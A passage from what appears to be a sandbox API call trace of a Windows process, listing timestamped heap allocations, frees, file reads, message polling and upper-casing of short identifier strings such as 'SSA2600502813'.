Size=0x4) returned 0x2a72208 [0151.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cdb020 [0151.835] SetFilePointerEx (in: hFile=0x4f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0151.835] ReadFile (in: hFile=0x4f8, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0xad4f, lpOverlapped=0x0) returned 1 [0151.837] ReadFile (in: hFile=0x4f8, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0151.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0151.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0151.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xad4f) returned 0x2a9a140 [0151.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cdb020 | out: hHeap=0x2af0000) returned 1 [0151.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0151.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0151.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0151.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0151.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0151.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xad4f) returned 0x2aaf410 [0151.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0151.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0151.842] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0151.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0151.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0151.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xad4f) returned 0x2a9a140 [0151.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0151.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0151.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0151.843] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0151.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0151.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0151.843] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0151.843] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0151.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0151.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xad4f) returned 0x2a9a140 [0151.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0151.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0151.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0c0 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0151.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0151.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xad4f) returned 0x2aba168 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0151.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0151.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0151.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0151.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0151.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0151.846] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0151.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0151.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0151.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0151.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0151.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0151.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0151.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0151.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0151.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0151.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0151.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0151.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0151.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0151.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0151.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0151.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0151.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0151.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0151.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0151.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0151.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0151.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0151.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0151.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0151.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0151.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0151.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0151.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0151.849] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0151.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0151.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1c8 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0151.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0151.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0151.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0151.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0151.850] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0151.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0151.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0151.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0151.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0151.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | 